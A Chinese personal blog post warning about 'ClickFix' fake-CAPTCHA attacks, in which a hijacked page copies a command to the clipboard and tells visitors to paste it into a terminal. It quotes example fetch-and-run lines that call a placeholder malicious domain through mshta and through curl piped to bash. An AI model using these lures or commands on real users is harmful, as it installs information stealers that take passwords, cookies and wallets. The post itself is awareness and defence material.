【踩坑】你以为在过人机验证，实际上正亲手把木马装进电脑 | ClickFix攻击

转载请注明出处：小锋学长生活大爆炸[xfxuezhagn.cn]
如果本文帮助到了你，欢迎[点赞、收藏、关注]哦~

学长今天在日常逛软件分享网站时候，跳出来一个谷歌人机验证，一开始没在意，但跟选图片的验证不一样的是，这次跳出来一个要终端输入命令的验证。得亏学长平时刷各种小网站看得多，意识到这就是个钓鱼验证，估计是这个网站被黑客劫持了。

这些指令看似无害，但如果你按照步骤操作，实际上会感染恶意软件，很可能是信息窃取程序。

原理解析

这种攻击之所以被称为“ClickFix”，是因为它本质上是一场精心的心理博弈（社会工程学），而不是利用系统漏洞。它的原理大概是这样的：

第一步：诱导访问恶意页面

页面会伪装成 Cloudflare 验证、Google reCAPTCHA 或微软服务界面，看起来非常正规。也可能某些老实本分的网站被黑客攻击后注入恶意代码。

第二步：伪造验证界面

页面会显示一个假的 "I'm not a robot" 复选框。用户点击后，页面不会显示正常的图片验证，而是弹出"额外验证步骤"，声称需要进一步证明你是人类。

甚至代码与正规的reCAPTCHA验证都不一样：

第三步：剪贴板劫持（核心攻击手法）

这是最关键的技术环节。在用户与页面交互的过程中（例如点击"复制"按钮或勾选复选框时），恶意 JavaScript 会在后台执行类似document.execCommand('copy')或Clipboard API，将一段经过混淆的恶意命令悄悄写入用户的剪贴板。

在基于 Chromium 内核的浏览器（几乎所有主流浏览器都是如此）中，网站只有在获得你的许可后才能写入剪贴板。但 Windows 系统误以为你在第一个屏幕上勾选复选框时已经同意了这一操作。 并且页面上显示的，只是你粘贴的内容的最后一部分，而你看到的并不是命令的真正部分，而只是添加到命令后面的注释！

在正常情况下，这就是我们所能看到的：

目标对象被指示粘贴的第一部分内容是以下几种变体（有时会进行模糊处理）：

mshta https://{malicious.domain}/media.file

Mshta 命令会触发合法的 Windows 可执行文件 mshta.exe。但 mshta 会从指定的域中获取恶意媒体文件并运行它。该媒体文件的名称可能看起来完全正常。这些文件实际上是一个经过编码的 PowerShell 命令，它会在后台隐蔽运行并下载实际的有效载荷。

也可能剪贴板里的内容已经被替换成了一串复杂的 Base64 加密字符或直接的 curl 下载指令，比如：

# 前面是恶意命令（被隐藏） curl -s https://malicious.domain/payload.sh | bash # 后面是显示给用户的"无害"文本（作为注释或命令的一部分） # "I am not a robot - reCAPTCHA Verification ID: 48164"

第四步：用户自行执行恶意命令

用户按照指示：

• • 打开 Terminal（macOS）或 Run 对话框/PowerShell（Windows）
• • 按 Command + V（或 Ctrl + V）粘贴
• • 按 Enter 执行

传统的恶意软件往往通过“下载文件并让用户点击安装”来传播，这种方式容易被浏览器的安全拦截（如 Chrome 的“此文件可能对您的计算机有害”）或系统的安全中心（Gatekeeper）发现。而终端是系统的底层管理工具，权限极高。因此，攻击者引导你直接在 Terminal（终端） 运行代码，当你手动粘贴代码并回车时，系统会认为这是用户授权的合法操作，从而绕过大多数浏览器的下载安全检测，安全软件通常也不会拦截用户在 Terminal 中手动执行的命令。

第五步：下载并执行恶意负载

一旦命令执行，通常会：

• • 使用 curl 或 mshta 等合法系统工具从远程服务器下载恶意脚本
• • 脚本可能下载信息窃取器（如 Lumma Stealer、Atomic macOS Stealer、Amos Stealer）
• • 窃取浏览器保存的密码、Cookie、加密货币钱包、自动填充数据等
• • 建立持久化机制（添加启动项、创建计划任务等）
• • 清除剪贴板内容以隐藏痕迹

为什么这种攻击有效？

这类攻击在 2024-2025 年激增超过500%，已成为增长最快的社会工程学威胁之一。

记住：真正的验证码，只在网页内点击复选框或选择图片、绝不会要求你打开系统终端、绝不会让你粘贴并执行代码。